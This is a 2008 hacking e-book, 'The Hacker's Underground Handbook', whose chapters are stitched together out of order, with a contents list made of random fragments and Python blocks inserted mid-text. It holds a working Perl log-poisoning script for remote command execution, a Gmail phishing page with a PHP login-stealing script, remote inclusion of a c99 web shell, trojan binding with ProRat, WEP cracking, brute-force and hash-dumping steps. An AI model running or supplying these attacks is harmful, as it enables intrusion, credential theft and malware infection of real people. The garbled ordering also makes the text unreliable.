
The Hacker's Underground Handbook


Contents

1. 4. Open CMD or Terminal and change into the directory with the exploit using the CD (change directory) command. Then run the exploit by typing: perl exploit.pl. The attack has begun. Simple, eh? [Screenshot: a Windows XP command prompt in which the user runs cd Desktop and then perl exploit.pl.] Python: Python is also a common programming language used in creating exploits. You can download Python from http://www.python.org/download. The steps to running a Python exploit are just as easy as the ones for Perl. See if you can get the exploit http://milw0rm.com/exploits/3523 up and running. Hint: Python files end with .py. C/C++: C/C++ are the most popular programming languages used in developing exploit code. Some C/C++ code can be compiled with any compiler and on any operating system. There are also C/C++ scripts that are made to be compiled by a particular compiler or in a particular operating system. You can usually find this information commented in the top of the script. Below is a list of the most popular compilers for each operating system. Windows: Microsoft Visual C++, Borland C++, Dev-C++. Mac: MrC/MrCpp, Xcode. Linux: GCC. Most C/C++ exploit code is made to be compiled in Linux. If you wish to run one of them but your only option is Windows, the
2. The Hacker's Underground Handbook: Learn What it Takes to Crack Even the Most Secure Systems. By David Melnichuk. http://www.learn-how-to-hack.net, http://www.MrCracker.com. Copyright Notice: This report may not be copied or reproduced unless specific permissions have been personally given to you by the author, David Melnichuk. Any unauthorized use, distributing or reproducing is strictly prohibited. Liability Disclaimer: The information provided in this eBook is to be used for educational purposes only. The eBook creator is in no way responsible for any misuse of the information provided. All of the information in this eBook is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. The word "Hack" or "Hacking" in this eBook should be regarded as "Ethical Hack" or "Ethical hacking" respectively. You implement the information given at your own risk. Copyright 2008 Learn-How-To-Hack.net. All Rights Reserved. Table of Contents: Introduction: How can I use this eBook? What is a hacker? Hacker Hierarchy. What does it take to become a hacker? Disclaimer. Programming: 1. Do I really need it? 2. Where should I start? 3. Best way to learn. Linux: What is it? Choosing a distribution. Running Linux. Passwords. Network Hacking. Wir
3. [Screenshot: the Nmap front end with Target target-site.com, Profile Intense Scan, and the command line nmap -T Aggressive -A -v target-site.com.] 2. Next the hacker would choose the Profile, or in other words the scan type. A smart hacker would go with a quick and quiet scan. Full version detection scans are very loud and could raise suspicion on the other end. Stay away from those options because, as you will see later on, there are other ways to get that information. [Screenshot: the Profile drop-down listing Intense Scan, Operating System Detection, Quick Full version Detection Scan, Quick Operating System detection, Quick Scan, Quick Services version detection, Quick and verbose scan, and Regular Scan.] 3. A sample scan result may look like the following: [Screenshot: a results table with the columns Port, Protocol, State, Service and Version, listing 22/tcp open ssh, 24/tcp open priv-mail, 53/tcp open domain, 80/tcp open http, 111/tcp open rpcbind and 3306/tcp open mysql.] 4. As you can see, it found a few open ports and listed the services that are run on them. Below I have a list of some of the most popular ports/services on the internet: 20 FTP data (File Transfer Protocol); 21 FTP (File Transfer Protocol); 22 SSH (Secure Shell); 23 Telnet; 25 SMTP (Send Mail Transfer Protocol); 43 whois; 53 DNS (Domain Name Service); 68 DHCP (Dynamic Host Control Protocol); 80 HTTP (HyperText Transfer Protocol); 110 POP3 (Post Office Protocol, version 3); 137 NetBIOS-ns; 138 NetBIOS-dgm; 139 N
4. [Screenshot: the FileZilla Server log during the brute-force attempt, showing the client at 127.0.0.1 repeatedly sending USER admin and receiving "331 Password required for admin".]
5. 13. You are now back at the main page. Here you will click CD/DVD-ROM. [Screenshot: the VirtualBox main window with the Ubuntu virtual machine selected (Powered Off). The Details pane lists Video Memory 8 MB; Boot Order Floppy, CD/DVD-ROM, Hard Disk; ACPI Enabled; IO APIC Disabled; VT-x/AMD-V Disabled; PAE/NX Disabled; Hard Disks: IDE Primary Master asdf.vdi (Normal, 3.00 GB); CD/DVD-ROM Not mounted; Floppy Not mounted; Audio Disabled; Network Adapter 1 PCnet-FAST III (NAT); Serial Ports Disabled; USB Disabled; Shared Folders None; Remote Display Disabled.] 14. Check Mount CD/DVD Drive and choose ISO Image File. [Screenshot: the Ubuntu Settings dialog on the CD/DVD-ROM page, with Mount CD/DVD Drive, Host CD/DVD Drive, Enable Passthrough and ISO Image File options; the help text reads "Invokes the Virtual Disk Manager to select a CD/DVD image to mount" and a warning says "Invalid settings detected".] 15. If you downloaded the Ubuntu image file in the beginning, locate it and select it. If you haven't downloaded it yet, go to the beginning of this chapter where I have a step by step guide. [Screenshot: the Virtual Disk Manager file chooser, "Select a CD/DVD-ROM disk image file", with the file ubuntu-8.04.1-desktop-i386 selected.]
6. 4. Once you find an access point, open a text document and paste in the network's broadcast name (essid), its MAC address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit <ENTER> to get more information about it. [Screenshot: the access point list with columns for channel, packets, flags and IP range.] 5. The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command: airodump-ng -c [channel] -w [filename] --bssid [bssid] [device]. In the above command, airodump-ng starts the program, the channel of your access point goes after -c, the file you wish to output the data to goes after -w, and the MAC address of the access point goes after --bssid. The command ends with the device name. Make sure to leave out the brackets. 6. Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command: aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]. In the above command we are using the aireplay-ng program. The -1 tells the program the specific attack we wish to use, which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapter's MAC address, -e is the name (essid) of the target a
7. Before I get into the example, you must first know what an FTP server is. FTP stands for File Transfer Protocol. FTP is a simple way to exchange files over the internet. If a hacker got FTP access to my website, he could delete/upload anything he wants on my server. An FTP address looks similar to a website address except it uses the prefix ftp:// instead of http://. I set up an FTP server on my computer so I could demonstrate. You can get Brutus at http://www.hoobie.net/brutus. 1. First the hacker would choose a target. In this case it's my home computer, and the IP address for your home computer is 127.0.0.1. 2. By going to ftp://127.0.0.1 I get a pop-up box asking for a username and password. [Screenshot: an "Authentication Required" dialog: "Enter username and password for ftp://127.0.0.1", with User Name and Password fields.] 3. Next the hacker would launch a program similar to Brutus and attempt to crack the password. [Screenshot: the Brutus AET2 window (www.hoobie.net/brutus, January 2000) with Target 127.0.0.1, Type FTP, Port 21, Connections 10, Timeout 60, and Authentication Options set to Word List with User File users.txt and Pass File words.txt.] 4. In the target you put the IP address of the website and to the right select the app
8. [Screenshot: the ProRat Create Server dialog on its General Settings tab, showing the server size, port, password and victim name fields and a set of checkboxes for stealth options.] 6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember, a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. In the example I will use an ordinary text document. [Screenshot: the Bind with File tab, "Bind server with a file", and a file chooser in which a text document named "Funny Joke" is selected.] 7. Click on the Server Ex
9. [Screenshot: the ProRat client's function list (Downloader, Printer, Online Editor, ProConnective, Create) with the status "Start button is hidden".] 14. The image below shows the message I would get on my screen if the hacker chose to message me. [Screenshot: ProRat v1.9 connected to 127.0.0.1, with the Message Box function selected, the message dialog shown on the victim's screen, and the status "Message sent".] 15. Below is an image of my task bar after the hacker clicks on Hide Start Button. [Screenshot: a Windows taskbar with the Start button missing.] 16. Below is an image of what the hacker would see if he chose to take a screen shot of the victim's screen. [Screenshot: the ProRat Screen Shot window with picture quality, show in fullscreen, Screen Shot Method and WebCam Shot Method options.] As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan, so if the victim has an anti-virus program installed he most likely won't get infected. Many skilled hackers can program their own viru
10. [Screenshot: the Ubuntu installer form with username david, a password field, Desktop Environment Ubuntu, and Accessibility and Install buttons.] 4. Wait for it to fully install and hit finish. Simple, eh? [Screenshot: "Ubuntu Setup: Installing Ubuntu 8.04.1. Please wait while the required files are retrieved and prepared" at 159.5 MB (21.9%) of 728.2 MB, followed by "Completing the Ubuntu Setup Wizard. Please remove any CD/DVD and reboot to complete the installation", with the choices Reboot now and I want to manually reboot later.] 5. Reboot the computer. Before Windows loads, a screen will come up that gives you an option to boot into Windows or Ubuntu. Arrow down to Ubuntu and hit <ENTER>. 6. Ubuntu will begin to load. Since this is your first time starting Ubuntu, it will install and configure a bunch of things and restart again. 7. Boot into Ubuntu again and you're good to go. VirtualBox: This is by far my favorite way to run any Linux distribution if I just want to try it out. With VirtualBox you can run Linux within a Windows or Mac computer. 1. First download VirtualBox at http://www.virtualbox.org/wiki/Downloads. Install it. Open it up and click New on the top. [Screenshot: the Sun xVM VirtualBox main window with the New, Settings, Delete, Start and Discard buttons.] Hit Next. [Screenshot: "Create New Virtual Machine: Welcome to the New Virtual Machine Wizard. This wizard will guide you through the steps that are necessary to create a new"]
11. 3. Now we will insert JavaScript. Search for <script>alert("hi")</script>. If the word hi pops up in a popup box, then the site is vulnerable to XSS. [Screenshot: the search box containing the script tag and the resulting alert box.] 4. As you can see, these examples are non-persistent. Now if a hacker found a guestbook or something else like it that was vulnerable, he would be able to make it persistent, and everyone that visits the page would get the above alert if that was part of his comment. Hackers knowledgeable in JavaScript and PHP will be able to craft advanced XSS attacks to steal your cookies and spread XSS worms, but to show you a simple example of something more realistic than the above examples, I will show you how a hacker could use XSS to help with phishing. 1. Let's say a hacker wants to phish passwords from www.victim-site.com. If he was able to find an XSS vulnerability anywhere on the website, he would be able to craft a link pointing to the legit website that redirects to his phishing website. In the example with the popup, when I inserted the JavaScript into the search box, a URL was formed that looked like the following: http://localhost/Form.php?searchbox=<script>alert("hi")</script>&search=Search. Here you can see that the code you typed into the search box was passed to the searchbox variable. In the URL, the hacker would then replace everything in between searchbox= and &search= with t
12. to the end of every included file. So if you included the shell, it would end up looking like c99.txt.php and not work. To get around this you would add a null byte (%00) to the end of c99.txt. This tells the server to ignore everything after c99.txt. 7. In step one I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be allinurl:.php?page=. This looks for URLs with .php?page= in them. This is only an example and you most likely won't find any vulnerable sites with that search. You can try switching around the word page with other letters and similar words. Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems, and search for websites that are running that vulnerable web application with a Google dork. 8. If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen similar to the following: [Screenshot: the c99shell v.1.0 beta web interface, showing the server software (Apache, PHP 4.4.7), the uname output, the uid/gid (99, nobody), the Safe mode status, the current directory, free disk space, and the shell's menu of functions such as Encoder, Bind, Proc, FTP brute, Sec, SQL, PHP code, Feedback, Self remove and Logout.]
13. at the Nmap manual: http://nmap.org/book/man.html. Now that the hacker has got all the running services and open ports on the target's system, he will now have to find out what versions the server is running. This is where Banner Grabbing comes in. Banner Grabbing: Now that the hacker has a full list of services running on the target system, to be able to exploit them he has to first figure out what software and version the service is. One way the hacker can get this information is to telnet into the service port. In the example below we will use command prompt on Windows (Start > Run > Type cmd > Enter). If you are on a Mac you will be using the terminal. Note: If you are using Windows Vista, then telnet is not installed by default. You can install it by doing the following simple steps: Click Start, then select Control Panel. Select Programs and Features. Select Turn Windows features on or off. Select the Telnet Client option and click OK. A box will appear to confirm installation. The telnet command should now be installed. 1. First the hacker would choose one of the open ports that were revealed in the Nmap scan to continue with and attempt to exploit. Let's say that when the hacker scanned his target he found the port 21 open. As you can see on the chart above, port 21 is FTP. To find out what FTP software is running, he would use telnet by running the command: [Screenshot: C:\WINDOWS\system32\cmd
14. being a target of NetBIOS attacks, simply disable file and printer sharing. In Windows Vista it is disabled by default, but you must do a little work in Windows XP: Go to Start > Control Panel > Network Connections. Double click on your active connection. In my case it is the Wireless Network Connection 2. Click on Properties. If File and Printer Sharing is selected, deselect it and click OK. [Screenshot: the Network Connections window under LAN or High-Speed Internet (1394 Connection and Wireless Network Connection 2, Connected, Firewalled, NETGEAR WG111 802.11g adapter); the Wireless Network Connection 2 Status dialog (Connected, Duration 01:08:43, Speed 1.0 Mbps, Signal Strength, Activity, with Disable and View Wireless Networks buttons); and the Wireless Network Connection 2 Properties dialog whose item list includes QoS Packet Scheduler, Network Monitor Driver and File and Printer Sharing for Microsoft Networks, with Install, Uninstall and Properties buttons and the options "Show icon in notification area when connected" and "Notify me when thi
15. does he go about running it against the target and penetrating the server? This will all be explained in this chapter. As you search milw0rm or any of the other couple exploit database websites provided in this chapter, you will notice that the exploits are created in many different types of programming languages. Below I will list a few of the most common programming languages used and how a hacker would compile and run them against a server. PHP: PHP exploits are very common. PHP exploit code usually starts with <?php and ends in ?>. Let's say the hacker wanted to do some temporary damage to a server running FTP Server 0.9.20. If he was to search milw0rm he would come up with the following DOS exploit, http://milw0rm.com/exploits/2901, and run it against the server. Below are the steps the hacker would take: 1. First the hacker would need to install PHP onto his computer. WAMP is a free web server that comes with PHP. If you are using a Mac then you must install MAMP. Next paste the PHP exploit into notepad or any word processor and save it as exploit.php. You will have to know a little PHP to edit the target address. On line 13 of this exploit you will see $address = gethostbyname('192.168.1.3'); here you will have to edit in the IP address of the target. Every exploit is different. Some you have to know what to edit and some have runtime instructions. Save this edited file into the PHP directory on your se
16. /etc/passwd file. If the hacker is able to successfully get to the /etc/passwd file, he would see a list similar to the one below: [Screenshot: the contents of /etc/passwd, with lines such as root:x:0:0:root:/root:/bin/bash, bin:x:1:1:bin:/bin:/bin/false, daemon:x:2:2:daemon:/sbin:/bin/false, adm:x:3:4:adm:/var/log:/bin/false, lp:x:4:7:lp:/var/spool/lpd:/bin/false, sync:x:5:0:sync:/sbin:/bin/sync, shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown and halt:x:7:0:halt:/sbin:/sbin/halt.] Each line is divided into seven parts: username:passwd:UserID:GroupID:full_name:directory:shell. If the password hash was shown, the hacker would be able to crack it and get access to the machine, but in our case the password isn't shown. This means that the password is shadowed and in the /etc/shadow file, which the hacker doesn't have access to. If this was the case, the hacker would probably attempt to get access to the system another way, through log injection. The log directories are located in different areas in different Linux distributions. Below is a list of the most common locations: ../apache/logs/error.log, ../apache/logs/access.log, ../../apache/logs/error.log, ../../apache/logs/access.log, ../../../apache/logs/error.log, ../../../apache/logs/access.log, /etc/httpd/logs/acces_log, /etc/httpd/logs/acces.log, /etc/httpd/logs/error_log, /etc/httpd/logs/error.log, /var/www/logs/access_log, /var/www/logs/access.log, /usr/local/apache/logs/access_log, /usr/local/apache/logs/access.log, /var/log/apache/acces
17. [Screenshot: C:\WINDOWS\system32\cmd.exe showing "Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp." and the command C:\Documents and Settings\David M>telnet localhost 21.] As you can see above, I ran this against my computer (localhost). So a hacker would insert a target URL in place of localhost. 2. Next it would connect to the target and display a banner telling the hacker the software and its version, as shown below. This is the information the hacker needs to continue and begin searching for vulnerabilities for the software discovered. [Screenshot: the Telnet localhost window showing the banner "220-FileZilla Server version 0.9.27 beta", "220-written by Tim Kosse" and "220 Please visit http://sourceforge.net/projects/filezilla/".] If the above method doesn't work for you, then simply use Nmap's full version detection option to get the information. Searching for Vulnerabilities: Now that the hacker has the name of the software being used and its version number, he would take that information and search a couple vulnerability databases for an exploit. If there's an exploit available, he will run it against the server and take complete control. If there isn't any, he would move onto another open port and try again on a different service. Some of the most popular exploit databases are: milw0rm, SecurityFocus, osvdb. By searching "filezilla" on milw0rm, fortunately the hacker won't find any exploits for my current version of
18. [Screenshot: the FileZilla Server log continuing the brute-force attempt, with the client at 127.0.0.1 sending PASS attempts and receiving "530 Login or password incorrect", followed by the server's connection list of sessions from 127.0.0.1 marked "not logged in".] 11. In place of the IP
19. [Screenshot: the Ubuntu website's Get Ubuntu page. It offers "Buy on CD or DVD" (buy a CD or DVD with Ubuntu, Edubuntu or Kubuntu from a distributor near you; in North America you can get Ubuntu and Kubuntu on DVD from Amazon.com), "Request a free CD" (request a free Ubuntu, Edubuntu or Kubuntu CD from Canonical; delivery typically takes 6-10 weeks; use each CD as many times as you like and pass it on to others; see the Shipit Questions page), and "Download Ubuntu": "The fastest way for most people to get Ubuntu is by downloading the CD Installer. The CD Installer is nearly 700MB. If you don't have a fast internet connection you may want to consider requesting a CD." The release choices are Ubuntu 8.04 LTS Desktop Edition (Supported to 2011) and Ubuntu 8.04 Server Edition.]
20. ports. It may take long if you want to scan too many ports. 5. Click start. The program will begin scanning, and when it's complete a box with the results will come up. [Screenshot: the Angry IP Scanner "Scanning finished" box: 224 IPs scanned, 1 alive host, 1 with open ports, 1 port scanned.] 6. As you can see, 224 IPs were scanned. Out of those, only one was alive and luckily it has port 139 open. [Screenshot: the scan results list of 192.168.1.x addresses, all reported Dead except one host, with hostname davids-machine.] 7. Open the Command Prompt by going to Start > Run > Type in cmd > <ENTER>. 8. Now the hacker would run nbtstat -a TargetIPaddress; this will tell us if the target has file and printing enabled. Without it, this attack is not possible. [Screenshot: C:\WINDOWS\system32\cmd.exe running nbtstat -a against the discovered 192.168.1.x host and beginning to list the Wireless Network Connection
21. the steps a hacker would take to exploit this type of vulnerability in a website: 1. First the hacker would find a website that gets its pages via the PHP include function and is vulnerable to RFI. Many hackers use Google dorks to locate servers vulnerable to RFI. A Google dork is the act of using Google's provided search tools to help get a specific search result. 2. Websites that include pages have a navigation system similar to: http://target-site.com/index.php?page=PageName. 3. To see if the page is vulnerable, the hacker would try to include a site instead of PageName, like the following: http://target-site.com/index.php?page=http://google.com. 4. If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell. 5. A couple of the most popular shells are c99 and r57. A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them. To find a shell, the hacker would search Google for inurl:c99.txt. This will display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems. The new URL with the shell included would look like: http://target-site.com/index.php?page=http://site.com/c99.txt?. 6. Sometimes the PHP script on the server appends .php
22. we will be running PWDUMP to obtain the password hashes. Make sure all of your anti-virus and anti-spyware programs are disabled, because most anti-virus programs mistake PWDUMP for a malicious program since it accesses the system files. If you don't disable the anti-virus program, PWDUMP will fail in retrieving the hashes. 6. Click Load and select Local SAM. This will load all the password hashes for all the users on your computer and display them. [Screenshot: the ophcrack table with the columns User, LM Hash, NT Hash, LM Pwd 1, LM Pwd 2 and NT Pwd, listing the Administrator, Bob, David M, Guest, HelpAssistant, Pushkin and SUPPORT accounts with their hashes.] 7. Next click Crack and the program will begin to crack the password hashes. 8. Once the program finishes cracking, you should see a screen similar to the following: [Screenshot: the same ophcrack table after cracking: Administrator not found; Bob LOLCATS / empty / lolcats; David M not found; Guest empty; HelpAssistant not found; Pushkin CHRISTM / AS02 / Christmas02; SUPPORT
23. [Screenshot: aircrack-ng's key-byte table (a column of candidate byte values and vote counts) ending with the line KEY FOUND and the recovered key in hex.] With all the different computers and network adapters out there, you may come across an error occasionally. If you get stuck, remember Google is your friend. Search for an answer and I guarantee you that 99% of the time you will find a solution. Packet Sniffing: I will be using the program Wireshark to demonstrate packet sniffing. Packet sniffing is the act of capturing packets going through a network. With a packet sniffer, once a hacker gains access to a wireless network he could intercept private information goin
24. %3C%20passthru($_GET[cmd])%20%3E. 5. When you submitted the script, the browser automatically encoded the URL. Luckily there is a Perl script that can get around this problem. Below is the Perl script; edit the variables $site, $path, $code and $log to the appropriate information:

```perl
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site = "www.vulnerablesite.com";
$path = "/";
$code = "<? passthru(\$_GET[cmd]) ?>";
$log  = "/etc/httpd/logs/error_log";
print "Trying to inject the code";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$site", PeerPort => "80") or die "\nConnection Failed.\n\n";
print $socket "GET " . $path . $code . " HTTP/1.1\r\n";
print $socket "User-Agent: " . $code . "\r\n";
print $socket "Host: " . $site . "\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "\nCode $code successfully injected in $log\n";
print "\nType command to run or exit to end: ";
$cmd = <STDIN>;
while ($cmd !~ "exit") {
    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$site", PeerPort => "80") or die "\nConnection Failed.\n\n";
    print $socket "GET " . $path . "index.php?filename=" . $log . "&cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: " . $site . "\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";
    while ($show = <
```
25. [Screenshot: the NetStumbler window listing the discovered wireless networks, with columns for MAC address, SSID, channel, speed, vendor, type and encryption, and a legend for Encryption Off, Encryption On, ESS (AP), IBSS (Peer), CF Pollable, Short Preamble, Default SSID and Channel Agility; the status bar reads "GPS: Disabled".] 4. If you click on the MAC address of one of the discovered wirele
[Screenshot: ophcrack results window. The Table pane shows the XP free fast table loaded 100% in RAM, preload done and brute force done; the hash list shows which passwords were found and the time elapsed.]

As you can see, two out of three of my account passwords were cracked in a matter of a couple of minutes:

- Bob: lolcats
- David M: not found
- Pushkin: Christmas02

Ophcrack LiveCD

The next method to crack the Windows hashes I will show you is through an ophcrack LiveCD.

1. Go to the ophcrack website and download the LiveCD for the correct operating system.
2. With the downloaded ISO, create a LiveCD the same way you did with the Ubuntu LiveCD in the Linux chapter.
3. Put the CD in your CD drive and restart to boot from the CD.
4. You will see the following boot menu.

[Screenshot: ophcrack LiveCD boot menu (Objectif Sécurité) with the options Ophcrack Graphic mode, Ophcrack Graphic VESA mode and Ophcrack Text mode.]

5. Hit <ENTER> or wait six seconds to boot into Ophcrack Graphic mode. If something goes wrong and the screen won't show the graphics, restart and go into Ophcrack Graphic VESA mode. If this also fails, go into Ophcrack Text mode.
6. Once ophcrack loads completely, it will automatically read your Windows password hashes from the local SAM and begin the cracking process.

Countermeasures

There are a couple of things you can do to prevent NetBIOS and ophcrack password cracking attacks.

1. To keep computer from
[Screenshot: the browser's Save As dialog, saving the Gmail login page as ServiceLogin with the type "Web Page, complete".]

3. Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it index is that when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.

4. Next, the hacker would create a PHP script to do his dirty deed of stealing your information. Below is a simple PHP script that logs and stores your login details when you click "Sign in". To see how it works, copy and paste the following code into Notepad. Next, save it into the same directory as you saved the Gmail page and name it phish.php. In addition to the phish.php page, create a new, empty text file and name it list.txt.

    <?php
    // This marks the beginning of the PHP script.
    // Once you click "Sign in" on the fake website, this redirects you to the real
    // Gmail website, making the whole process look more legitimate.
    header("Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=default&ltmplcache=2");
    $handle = fopen("list.txt", "a"); // This tells the server to open the file list.txt and
            print $show;
        }
        close($socket);
        print "Type command to run or exit to end: ";
        $cmd = <STDIN>;
        chomp($cmd);
    }

6. Once the hacker runs this script and it goes successfully, he will be able to run any command on the server, with the privileges of the web server's user account. From here he can run local exploits to gain root or just browse the server's files.

Chapter Ten: Conclusion

Congratulations! You've made it through the whole course. With this course you have been introduced to many categories in the vast subject of hacking. By now you should be craving more knowledge. So what now?

Keep Learning

That's right: keep learning. Choose your favorite topic in this e-book and begin to learn more about it. Eventually, when you master it, continue to another. One of the biggest mistakes I notice with new and intermediate ethical hackers is that they want to know everything at once. They go out and jump from topic to topic. Time passes by and they still don't know enough about anything. I know, I went through this phase as well. Trust me.

One of the best ways to learn is to purchase books on your topic, subscribe to related blogs and join ethical hacking communities. Below is a list I put together of some of the best hacking-related websites on the internet:

- HackThisSite: Great site for continued learning in web hacking.
- HellBound Hackers: Another mainly web hacking related website.
- Astalavista: Astalavista is a community full of security prof
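The local file inclusion the Perl script above relies on (index.php?filename=...) exists because a client-supplied path is handed straight to include(). As an added example that is not part of the original book, the Python below mimics that pattern beside a hardened version, against a small directory tree built in a temporary folder. The web root, the page name and the poisoned log line are constructed for the demonstration.

```python
import os
import tempfile

# Constructed stand-in for the target: a web root with one page, and an error
# log one level above it holding a User-Agent line poisoned with a PHP tag.
POISONED_UA = "<?passthru($_GET[cmd])?>"


def make_demo_tree() -> str:
    """Build the demo tree in a temp dir and return the web root path."""
    base = tempfile.mkdtemp()
    docroot = os.path.join(base, "www")
    logdir = os.path.join(base, "logs")
    os.makedirs(docroot)
    os.makedirs(logdir)
    with open(os.path.join(docroot, "home.html"), "w") as fh:
        fh.write("<h1>Home</h1>")
    with open(os.path.join(logdir, "error_log"), "w") as fh:
        fh.write("[error] [client 10.0.0.5] File does not exist: /var/www/" + POISONED_UA + "\n")
    return docroot


def vulnerable_include(docroot: str, filename: str) -> str:
    """Mirror of include($_GET['filename']): the client controls the path, so
    '../logs/error_log' walks out of the web root, and an absolute filename
    makes os.path.join discard docroot entirely."""
    path = os.path.join(docroot, filename)
    with open(path, "r", errors="replace") as fh:
        return fh.read()


# Hardened version: the client chooses a key, never a path.
PAGES = {"home": "home.html"}


def hardened_include(docroot: str, page: str) -> str:
    if page not in PAGES:
        raise PermissionError("unknown page: %r" % page)
    root = os.path.realpath(docroot)
    path = os.path.realpath(os.path.join(root, PAGES[page]))
    # Defence in depth: even a bad entry in PAGES cannot resolve outside the web root.
    if os.path.commonpath([root, path]) != root:
        raise PermissionError("path escapes web root")
    with open(path, "r") as fh:
        return fh.read()


if __name__ == "__main__":
    root = make_demo_tree()
    print(vulnerable_include(root, "../logs/error_log"))   # the injected tag comes back
    try:
        hardened_include(root, "../logs/error_log")
    except PermissionError as exc:
        print("blocked:", exc)
```

The allowlist is the real fix; the realpath check is there so that a later mistake in the mapping table still cannot turn into traversal.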
[Screenshot: Wireshark capturing on the USB 2.0 adapter with the display filter msnms applied. The packet list shows MSN Messenger MSG packets between 192.168.1.101 and 207.46.27.34; the details pane expands Frame, Ethernet II, Internet Protocol, TCP (source port 7601, destination port msnp) and MSN Messenger Service, with the message body visible as text/plain.]

6. As you can see, my message is displayed at the bottom. If I continue down the list I can see the whole conversation. Usernames and passwords are captured the same way, and if they aren't encrypted you can see them in plain text.

Some other useful sniffing programs to learn:
- WinDump
- Snort
- Dsniff

Countermeasures

There are a few countermeasures
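What Wireshark shows in the screenshot is just the TCP payload of each frame, laid out protocol by protocol. To make the "captured the same way" point concrete, here is an added example (not from the book) in Python that dissects raw Ethernet II / IPv4 / TCP frames with the standard library and pulls plaintext credentials out of them: FTP USER/PASS lines and HTTP Basic authorization headers, which are base64, not encryption. The frames, addresses and credentials are constructed inline so the code runs offline; on a real capture the same dissector would be fed frames read from a pcap file or a raw socket.

```python
import base64
import struct


def build_frame(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Constructed Ethernet II + IPv4 + TCP frame for the demo (checksums left at zero)."""
    eth = bytes.fromhex("000755705e0b") + bytes.fromhex("000c41f40765") + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0x4000, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    return eth + ip + tcp + payload


def dissect(frame: bytes):
    """Return (src, dst, sport, dport, payload) for an IPv4/TCP frame, or None for anything else."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":      # EtherType 0x0800 = IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:                                           # protocol 6 = TCP
        return None
    total_len = struct.unpack("!H", ip[2:4])[0]
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:total_len]                                  # stops before any trailer/padding
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_offset = (tcp[12] >> 4) * 4
    return src, dst, sport, dport, tcp[data_offset:]


def find_credentials(frames):
    """Scan TCP payloads for credentials sent in the clear."""
    hits = []
    for frame in frames:
        parsed = dissect(frame)
        if parsed is None:
            continue
        src, dst, sport, dport, payload = parsed
        for line in payload.decode("latin-1").split("\r\n"):
            if line.startswith(("USER ", "PASS ")):
                hits.append((src, dst, dport, "FTP", line))
            elif line.lower().startswith("authorization: basic "):
                creds = base64.b64decode(line.split(" ", 2)[2]).decode("latin-1")
                hits.append((src, dst, dport, "HTTP Basic", creds))
    return hits


# Constructed capture: an FTP login and an HTTP request carrying Basic auth.
SAMPLE_FRAMES = [
    build_frame("192.168.1.101", "192.168.1.1", 7601, 21, b"USER david\r\n"),
    build_frame("192.168.1.1", "192.168.1.101", 21, 7601, b"331 Password required for david\r\n"),
    build_frame("192.168.1.101", "192.168.1.1", 7601, 21, b"PASS hunter2\r\n"),
    build_frame("192.168.1.101", "192.168.1.1", 7602, 80,
                b"GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic ZGF2aWQ6aHVudGVyMg==\r\n\r\n"),
]

if __name__ == "__main__":
    for hit in find_credentials(SAMPLE_FRAMES):
        print(hit)
```

Anything that rides a TLS or SSH tunnel never shows up here, which is the whole argument for the countermeasures that follow.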
[Screenshot: the CD recording wizard with the Ubuntu 8.04.1 desktop ISO from the Downloads\Linux folder selected as the source image and a blank writable disc as the recorder, followed by the "Operation has been completed. Click Finish to exit." dialog.]

3. Restart the computer with the newly made CD in the CD-ROM drive. If your computer doesn't boot from the CD and continues into Windows, you must change your computer's boot order. You can do this by restarting your computer and going into the BIOS. You get there by hitting the correct key repeatedly as the machine starts; if you see the Windows screen, it means you missed it. The key varies from system to system. Usually it is a function key such as F10; it may also be the DEL or ESC key. The key should be shown on your screen immediately after you boot up your computer, usually as the key for Setup (Setup gets you into the BIOS).

[Screenshot: a Dell Dimension boot screen showing the BIOS revision and the key to press to enter Setup. Picture property of www.cyberwalker.com.]

Once you are in the BIOS, select Boot Sequence and make sure CD-ROM is the first entry. If it's not, move it up. All this does is make sure your CD-ROM is tried before your hard drive.

